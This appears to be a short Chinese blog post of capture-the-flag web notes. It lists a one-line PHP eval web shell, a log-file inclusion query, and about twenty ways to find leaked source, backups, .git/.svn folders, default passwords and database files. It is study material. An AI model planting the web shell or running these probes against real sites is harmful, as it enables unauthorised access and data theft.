notes of web<持续更新>

web常用套路
01 默认目录获取日志

?url=/var/log/nginx/access.log

02 a sentence

<?php @eval($_POST['a']);?>

web信息泄露
01 源码泄露

f12

02 phps源码泄露

访问index.phps下载备份文件

03 源码压缩包泄露 (访问www.zip下载源码)
04 前台JS绕过

1.禁用JS,再查看源代码
2.在网址前加上view-source:即可查看源代码
3.ctrl+u查看源代码

05 协议头信息泄露

抓包,查看响应头,即可得到flag

06 robots后台泄露

访问robots.txt

07 Git泄露(版本控制)

访问目录url/.git/

08 SVN泄露(开放源代码的版本控制系统)

访问url/.svn即可
git与svn的区别:
1.git是分布式的,svn是集中式的
2.git将每个历史版本都存储完整的文件,svn只是存储差异的文件,历史版本不可恢复
3.git可以离线完成大部分的操作,svn不可以离线操作
4.git可以实现分支合并
5.git可以修改和撤销修改历史版本
6.git速度快,效率高
7.git有本地仓库
8.git以元数据方式存储,svn以原始文件存储

09 vim临时文件泄露

url/index.php.swp下载备份文件

10 cookie泄露

抓包查看cookie发现flag

11 域名txt记录泄露

在线DNS域名解析,即可得到flag
网站:
https://whois.chinaz.com/
http://www.jsons.cn/nslookup/
https://zijian.aliyun.com/

12 敏感信息公布

管理员常用密码 admin root...

13 内部技术文档泄露

doucument链接得到后台地址和账号密码

14 编辑器配置不当

访问url/editor

15 密码逻辑脆弱

已知信息->访问后台地址/admin

16 探针泄露

访问/tz.php

17 CDN穿透

Ping +网址

18 js敏感信息泄露

查看源文件

19 前端密钥泄露

源码密钥已知 post提交

20 数据库恶意下载

早期asp+access架构的数据库文件为db.mdb,直接查看url路径添加/db/db.mdb下载文件,用记事本打开搜索flag

上一篇:swagger 相关


下一篇:System Security 03| Notes && Homework - ret2libc